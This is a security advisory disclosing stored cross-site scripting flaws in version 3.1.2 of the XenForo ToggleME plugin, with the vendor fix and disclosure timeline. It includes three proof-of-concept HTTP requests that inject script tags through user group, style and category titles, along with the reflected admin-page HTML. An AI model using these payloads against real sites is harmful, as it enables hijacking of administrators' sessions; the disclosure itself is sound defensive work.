RCE Security Advisory
https://www.rcesecurity.com


1. ADVISORY INFORMATION
=======================
Product:        XenForo ToggleME plugin
Vendor URL:     https://xenforo.com/community/resources/toggleme.137/
Type:           Cross-Site Scripting [CWE-79]
Date found:     2016-09-06
Date published: 2016-09-11
CVSSv3 Score:   5.5 (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N)
CVE:            -


2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED
====================
ToggleME 3.1.2
older versions may be affected too.


4. INTRODUCTION
===============
This addon will allow your users to collapse/expand some parts of your
website:
-forum categories
-widgets
-sidebar
-sub-forums
-postbit (*)
-polls (*)

(from the vendor's homepage)


5. VULNERABILITY DETAILS
========================
The script "/admin.php?options/list/toggleME" is vulnerable to multiple
authenticated persistent Cross-Site Scripting vulnerabilities when user-
supplied input is processed by the web application.

Since the application does not properly validate and sanitize the user
group title, the style title and the category title values, which can be
configured in the XenForo backend, it is possible to place arbitrary
script code permanently on the administrative interface of the plugin
"Home > Options > ToggleME" ("/admin.php?options/list/toggleME").

User Group Title PoC
--------------------
The following Proof-of-Concept triggers this vulnerability by changing
the title of the existing user group "test" to
"><script>alert('usergroups-XSS')</script>:

POST /admin.php?user-groups/test.9/save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0)
Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/admin.php?user-groups/test.9/edit
Cookie: xf_session_admin=06b0b5071e919de710599c78fccc8098;
xf_session=d096696f90bd4b03d6430199458ab570; xf_edit_style_id=5
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 119

title="><script>alert('usergroups-XSS')</script>&_xfToken=34486%2C1473325543%2Cd4c5dcb2ad2f2d5c42057fde1e5c0c3720f20179


The payload is then reflected multiple times on the
"Home > Options > ToggleME" page, e.g.:

<li><label for="ctrl_optionstoggleME_Usergroups_Forumhome_9"><input
type="checkbox" name="options[toggleME_Usergroups_Forumhome][]"
value="9" id="ctrl_optionstoggleME_Usergroups_Forumhome_9"
checked="checked" /> "><script>alert('usergroups-XSS')</script></label></li>


Style Title PoC
---------------
The following Proof-of-Concept triggers this vulnerability by adding a
new style with the title "><script>alert('styles-XSS')</script>:

POST /admin.php?styles/save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0)
Gecko/20100101 Firefox/48.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Ajax-Referer: http://localhost/admin.php?styles/add
x-requested-with: XMLHttpRequest
Referer: http://localhost/admin.php?styles/add
Content-Length: 330
Cookie: xf_session_admin=06b0b5071e919de710599c78fccc8098;
xf_session=d096696f90bd4b03d6430199458ab570; xf_edit_style_id=5
Connection: close

parent_id=0&title=Test%3Cscript%3Ealert('styles-XSS')%3C%2Fscript%3E&description=&user_selectable=1&style_id=&_xfToken=34486%2C1473326249%2C9a56292449c786527b4faf2be04e1d50786120a2&_xfRequestUri=%2Fadmin.php%3Fstyles%2Fadd&_xfNoRedirect=1&_xfToken=34486%2C1473326249%2C9a56292449c786527b4faf2be04e1d50786120a2&_xfResponseType=json


The payload is then reflected on the "Home > Options > ToggleME" page:

<li><label for="ctrl_optionstoggleME_styles_18"><input type="checkbox"
name="options[toggleME_styles][]" value="18"
id="ctrl_optionstoggleME_styles_18" />
Test<script>alert('styles-XSS')</script></label></li>


Category Title PoC
------------------
The following Proof-of-Concept triggers this vulnerability by adding a
new category node with the title "><script>alert('category-XSS')</script>:

POST /admin.php?categories/save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0)
Gecko/20100101 Firefox/48.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Ajax-Referer: http://localhost/admin.php?nodes/insert
x-requested-with: XMLHttpRequest
Referer: http://localhost/admin.php?nodes/insert
Content-Length: 367
Cookie: xf_session_admin=06b0b5071e919de710599c78fccc8098;
xf_session=d096696f90bd4b03d6430199458ab570; xf_edit_style_id=5
Connection: close

title=Test%3Cscript%3Ealert('category-XSS')%3C%2Fscript%3E&description=&parent_node_id=0&display_order=1&display_in_list=1&node_type_id=Category&_xfToken=34486%2C1473326559%2C064f98b492af07e40d91b3e87c4b83838f260ad0&_xfRequestUri=%2Fadmin.php%3Fnodes%2Finsert&_xfNoRedirect=1&_xfToken=34486%2C1473326559%2C064f98b492af07e40d91b3e87c4b83838f260ad0&_xfResponseType=json


The payload is then reflected multiple times on the "Home > Options >
ToggleME" page like

<li><label for="ctrl_optionstoggleME_DefaultOff_XenCat_70"><input
type="checkbox" name="options[toggleME_DefaultOff_XenCat][]" value="70"
id="ctrl_optionstoggleME_DefaultOff_XenCat_70" />
Test<script>alert('category-XSS')</script></label></li>


6. RISK
=======
To successfully exploit these vulnerabilities, a user with rights to add
or change user group titles, style titles or category titles must trick
another authenticated user with access rights to the administrative panel
of the plugin to visit the affected configuration page of the plugin.

The vulnerabilities allow remote attackers to permanently embed arbitrary
script code into the administrative context of the plugin configuration
page within the XenForo administrative backend interface, which offers a
wide range of possible attacks such as redirecting the user for phishing
purporses or attacking the browser and its components of a user visiting
the page.


7. SOLUTION
===========
Update to ToggleME 3.1.4


8. REPORT TIMELINE
==================
2016-09-06: Discovery of the vulnerability
2016-09-07: Notified vendor via xenforo.com/community
2016-09-07: Vendor response to notification
2016-09-08: Full details sent to vendor
2016-09-08: Vendor releases ToggleMe 3.1.4 which fixes the issues
2016-09-11: Advisory released


9. REFERENCES
=============
https://xenforo.com/community/resources/toggleme.137/update?update=20258
https://github.com/cclaerhout/xen_ToggleME/commit/3131d8042b6cf4d4f5e48b48337007c428dfa49e